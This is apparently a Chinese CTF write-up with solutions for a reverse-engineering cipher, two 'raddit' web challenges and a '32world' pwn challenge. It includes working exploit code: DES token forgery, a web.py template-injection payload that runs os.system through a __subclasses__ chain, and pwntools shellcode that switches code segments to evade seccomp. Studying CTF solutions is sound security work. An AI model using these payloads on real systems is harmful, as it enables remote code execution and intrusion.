        return index_table2[b[0]] ^ index_table3[b[1]] ^ index_table4[b[2]] ^ index_table1[b[3]]

    t1, t2, t3, t4 = [u32(data[k:k + 4]) for k in (0, 4, 8, 12)]
    t1 ^= 0x0C01A4D6E
    t2 ^= 0x0A4CB6636
    t3 ^= 0x5B0F5BA1
    t4 ^= 0x2B266926
    for i in range(0, 32, 4):
        t5, t6 = sbox_a(t1), sbox_b(t2)
        t3 = ROR(t3 ^ ((xor_table[i] + t5 + t6) % mask), 1)
        t4 = ROL(t4, 1) ^ ((xor_table[i + 1] + t5 + t6 * 2) % mask)
        t5, t6 = sbox_a(t3), sbox_b(t4)
        t1 = ROR(t1 ^ ((xor_table[i + 2] + t5 + t6) % mask), 1)
        t2 = ROL(t2, 1) ^ ((xor_table[i + 3] + t5 + t6 * 2) % mask)
        print(hex(t1), hex(t2), hex(t3), hex(t4), hex(t5), hex(t6))
    t3 ^= 0x0EF75CB8F
    t4 ^= 0x0A037222A
    t1 ^= 0x0BA69619A
    t2 ^= 0x60798932
    return p32(t3) + p32(t4) + p32(t1) + p32(t2)
解密算法如下(就是把上面每一轮的操作按相反顺序逐步撤销,注意输入的字序和 en 的输出一致,即 t3,t4,t1,t2):
def de(data):
    """Invert ``en`` for one 16-byte block.

    ``data`` is taken in ``en``'s output order (t3, t4, t1, t2), the output
    whitening is removed, the eight double-rounds are undone from the last
    to the first, and the input whitening is removed. Returns the block in
    natural order ``p32(t1) + p32(t2) + p32(t3) + p32(t4)``. The hex trace
    printed at the start of each round mirrors the one ``en`` prints at the
    end of its round, so the two logs can be diffed.
    """
    mask = 0x100000000

    def sbox_a(word):
        b = to_bytes(word)
        return index_table1[b[0]] ^ index_table2[b[1]] ^ index_table3[b[2]] ^ index_table4[b[3]]

    def sbox_b(word):
        b = to_bytes(word)
        return index_table2[b[0]] ^ index_table3[b[1]] ^ index_table4[b[2]] ^ index_table1[b[3]]

    t3, t4, t1, t2 = [u32(data[k:k + 4]) for k in (0, 4, 8, 12)]
    t3 ^= 0x0EF75CB8F
    t4 ^= 0x0A037222A
    t1 ^= 0x0BA69619A
    t2 ^= 0x60798932
    for i in range(28, -1, -4):
        t5, t6 = sbox_a(t3), sbox_b(t4)
        print(hex(t1), hex(t2), hex(t3), hex(t4), hex(t5), hex(t6))
        t2 = ROR(t2 ^ ((xor_table[i + 3] + t5 + t6 * 2) % mask), 1)
        t1 = ROL(t1, 1) ^ ((xor_table[i + 2] + t5 + t6) % mask)
        t5, t6 = sbox_a(t1), sbox_b(t2)
        t4 = ROR(t4 ^ ((xor_table[i + 1] + t5 + t6 * 2) % mask), 1)
        t3 = ROL(t3, 1) ^ ((xor_table[i] + t5 + t6) % mask)
    t1 ^= 0x0C01A4D6E
    t2 ^= 0x0A4CB6636
    t3 ^= 0x5B0F5BA1
    t4 ^= 0x2B266926
    return p32(t1) + p32(t2) + p32(t3) + p32(t4)
def xor_str(a, b):
    """XOR the first 16 characters of ``a`` and ``b`` byte-wise.

    Both inputs must be at least 16 characters long (an IndexError is raised
    otherwise, as before); anything past the 16th character is ignored.
    """
    return ''.join(chr(ord(a[i]) ^ ord(b[i])) for i in range(16))
# Three 16-byte ciphertext blocks taken from the binary.
de_flag = [0x4F, 0x6F, 0xA7, 0x87, 0xE9, 0x51, 0x87, 0x64, 0x38, 0x2A, 0x46, 0xE5, 0x4F, 0x21, 0x9E, 0x1C, 0xCD, 0x65, 0xE1, 0x9A, 0x4F, 0xCF, 0xDE, 0x52, 0x09, 0xBF, 0x53, 0xC4, 0xB0, 0x95, 0x75, 0x31, 0xAC, 0x2F, 0xF4, 0x97, 0x1D, 0xA5, 0x9A, 0x02, 0xA8, 0xFF, 0xAE, 0x2E, 0xB9, 0x70, 0xCC, 0x02]
de_c = ''.join(chr(v) for v in de_flag)
# sanity check of the inverse:  print(de(en('a'*16)))
# Block 3 is decrypted and XORed with block 2 (CBC-style chaining); this
# prints only the last 16 plaintext bytes, the tail of the flag below.
print(xor_str(de_c[16:32], de(de_c[32:48])))
# ~Exc3p7i0n-Ori3n7ed-Pr0grammin9~RoO0cks!!\o^_^o/
Web
On my raddit
8个字节分组加密,动一动LSB仍然可以解密,DES?
2e7e305f2da018a2cf8208fa1fefc238 + 加密的文件名 + 3ca92540eb2d0a42 下载文件
3ca92540eb2d0a42 应该是纯 padding 块:明文长度正好是 8 的倍数时 PKCS#5 会再补一整块 0808080808080808,于是这一组密文对应的明文是已知的,拿 hashcat 的 DES 已知明文模式爆破 8 字节密钥
3ca92540eb2d0a42:0808080808080808:ldgonaro
Session..........: hashcat
Status...........: Cracked
Hash.Type........: DES (PT = $salt, key = $pass)
Hash.Target......: 3ca92540eb2d0a42:0808080808080808
爆破出来一个 ldgonaro,当 FLAG 提交不对,应该是个等效密钥:DES 只用每个密钥字节的高 7 位,最低位是奇偶校验位会被忽略,而 ldgonaro 和后面拿到的真实密钥 megnnaro 逐字节恰好只差最低位(l/m、d/e、o/n),所以加解密结果完全一样。
首页有下载链接,发现能下载文件,于是解密:
from Crypto.Cipher import DES
key = 'ldgonaro'   # hashcat hit; parity-bit equivalent of the real key 'megnnaro' (see raddit2)
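def decrypt(decryptText):
    """Decrypt a hex-encoded DES-ECB token and strip its PKCS#5 padding.

    Returns the plaintext, or ``""`` when the input is not valid hex, is not
    a whole number of 8-byte blocks, or does not end in well-formed padding
    (a pad byte 1..8 repeated that many times). The previous version removed
    ``ord(last_byte)`` bytes blindly and hid every error behind a bare
    ``except``; malformed tokens now fail closed instead of yielding junk.
    """
    try:
        raw = decryptText.decode('hex')
        plain = DES.new(key, DES.MODE_ECB).decrypt(raw)
    except (TypeError, ValueError):
        # decode('hex') raises TypeError on odd-length / non-hex input,
        # DES raises ValueError when the length is not a block multiple.
        return ""
    if not plain:
        return ""
    pad = ord(plain[-1])
    if not 1 <= pad <= DES.block_size or plain[-pad:] != chr(pad) * pad:
        return ""
    return plain[:-pad]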
# Token from the download link: 8 DES blocks (64 hex chars x 2), the last one
# being the all-0x08 padding block cracked above. Decrypts to the query string
# shown on the next line.
print decrypt('2e7e305f2da018a2cf8208fa1fefc238522c932a276554e5f8085ba33f9600b301c3c95652a912b0342653ddcdc4703e5975bd2ff6cc8a133ca92540eb2d0a42')
=>m=d&f=uploads%2F70c97cc1-079f-4d01-8798-f36925ec1fd7.pdf
将f参数换成app.py
加密得到E2272B36277C708BC21066647BC214B8,然后得到密钥megnnaro
On my raddit2
https://securityetalii.es/2014/11/08/remote-code-execution-in-web-py-framework/
web.py的db写的有问题:
# coding: UTF-8
import os
import urllib
import urlparse
from Crypto.Cipher import DES
# (sic, misspelt in the original) The real 8-byte DES key, confirmed by
# encrypting a chosen query string and matching the server's token above.
ENCRPYTION_KEY = 'megnnaro'
def encrypt(s):
    """PKCS#5-pad ``s`` to the DES block size and return the ECB ciphertext as hex."""
    pad_len = DES.block_size - len(s) % DES.block_size
    padded = s + chr(pad_len) * pad_len
    cipher = DES.new(ENCRPYTION_KEY, DES.MODE_ECB)
    return cipher.encrypt(padded).encode('hex')
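def decrypt(s):
    """Decrypt a hex DES-ECB token and parse the plaintext as a query string.

    Returns the parsed key/value dict, or ``{}`` when the token is not valid
    hex, not a whole number of blocks, or its PKCS#5 padding is malformed
    (the old version stripped ``ord(last_byte)`` bytes without checking).
    ECB with a fixed key and no authentication means anyone holding
    ``ENCRPYTION_KEY`` can mint a token carrying arbitrary parameters --
    which is exactly what the two ``print encrypt(...)`` lines below do.
    """
    try:
        cipher = DES.new(ENCRPYTION_KEY, DES.MODE_ECB)
        data = cipher.decrypt(s.decode('hex'))
    except (TypeError, ValueError) as e:
        # TypeError: odd-length / non-hex input; ValueError: bad length.
        print(str(e))
        return {}
    if not data:
        return {}
    pad = ord(data[-1])
    if not 1 <= pad <= DES.block_size or data[-pad:] != chr(pad) * pad:
        return {}
    return dict(urlparse.parse_qsl(data[:-pad]))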
# Token 1: mode 'p' with a web.py template expression in `l` (see the linked
# write-up): `${...}` is evaluated server-side; the classic
# __subclasses__()[N]()._module.linecache.os chain reaches os.system. The
# index 59 is interpreter-specific and was found by trial against the target.
print encrypt(urllib.urlencode({'m':'p','l':"${[].__class__.__base__.__subclasses__()[59]()._module.linecache.os.system('/read_flag > /tmp/fffza')}"}))
# Token 2: mode 'd' (download, as decoded in part 1) fetches the captured output.
print encrypt(urllib.urlencode({'m':'d','f':'/tmp/fffza'}))
然后依次访问即可。
MISC
Lumosity
签到题
EV3 Basic
LEGO EV3机器人的数据包
81 xx 81 xx 84 xx 应该表示列,行,字符
0a 14 1e 28 32 3c 46 50 5a 64 6e 78 82 8c 96 a0
28 h i t c o n { m 1 n d 5 t 0 r m
36 _ c o m m u n i c a t i o n _ a
44 n d _ f i r m w a r e _ d e v e
52 l o p e r _ k i t }
32world
64bit ELF,retf 切到 32 位代码后执行 24 字节的 shellcode;下面的 seccomp 规则只放行 instruction_pointer 高 32 位非零的 syscall(否则 KILL),所以发 syscall 时 IP 必须大于 0xFFFFFFFF,也就是要先切回 64 位、跑在 4GiB 以上的地址。
line CODE JT JF K
=================================
0000: 0x20 0x00 0x00 0x0000000c A = instruction_pointer >> 32
0001: 0x15 0x00 0x01 0x00000000 if (A != 0x0) goto 0003
0002: 0x06 0x00 0x00 0x00000000 return KILL
0003: 0x06 0x00 0x00 0x7fff0000 return ALLOW
切回64bit,跳一个one gadget,读一下fs拿地址
from pwn import *
#p = process('./32world')
p = remote('54.65.133.244', 8361)
# Stage 1 is assembled as i386: per the note above the binary has already
# done a retf into 32-bit mode when the shellcode starts running.
context(bits = 32, arch = 'i386')
sc1 = '''
retf
'''
sc11 = asm('push 0x33')    # 0x33: the 64-bit code segment selector that retf will load into cs
sc1 = asm(sc1)
print sc1, len(sc1)
context(bits = 64, arch = 'amd64')
# 64-bit stub: fs-relative read of a libc pointer (assumes rdx == 0 at this
# point -- not verified here), add the one-gadget delta for the given libc,
# call it. Runs above 4 GiB so the seccomp filter lets the syscalls through.
sc2 = asm('mov rax, fs:[rdx+0x900]; add rax, 0xf1147; call rax')
# Layout: push 0x33 ; call +0x10 ; <sc2> ; retf. The call pushes the address
# of sc2 as its return address and jumps over it to the retf, which then pops
# ip = sc2 and cs = 0x33, i.e. a far return into 64-bit mode. The rel32 0x10
# must equal len(sc2); total is the 24 bytes mentioned above.
sc1 = sc11 + '\xe8\x10\x00\x00\x00' + sc2 + sc1
print sc1, len(sc1)
p.sendline(sc1)
p.interactive()